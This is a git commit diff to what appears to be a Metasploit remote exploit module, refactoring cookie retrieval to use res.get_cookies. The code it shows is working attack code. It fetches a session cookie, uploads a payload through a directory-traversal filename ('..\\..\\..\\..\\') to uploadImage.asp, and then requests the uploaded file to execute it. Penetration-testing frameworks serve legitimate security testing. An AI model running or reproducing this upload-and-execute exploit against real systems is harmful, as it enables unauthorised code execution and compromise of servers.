Use res.get_cookies instead of homebrew parse. Use _cgi

bug/bundler_fix
Thomas Hibbert 2013-11-28 16:35:36 +13:00
parent bb0753fcdd
commit d1e4975f76
1 changed files with 11 additions and 20 deletions

View File

@ -53,21 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Appears
end
def get_cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
})
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
end
cookie
end
def exploit
peer = "#{rhost}:#{rport}"
@ -80,8 +65,14 @@ class Metasploit3 < Msf::Exploit::Remote
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
cookie = get_cookie
res = send_request_raw({
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
})
cookie = res.get_cookies
res = send_request_cgi({
"method" => "POST",
"uri" => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
"data" => data,
@ -89,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote
"cookie" => cookie
})
register_files_for_cleanup(@payload_name)
if not res or res.code != 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
register_files_for_cleanup(@payload_name)
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(@payload_name),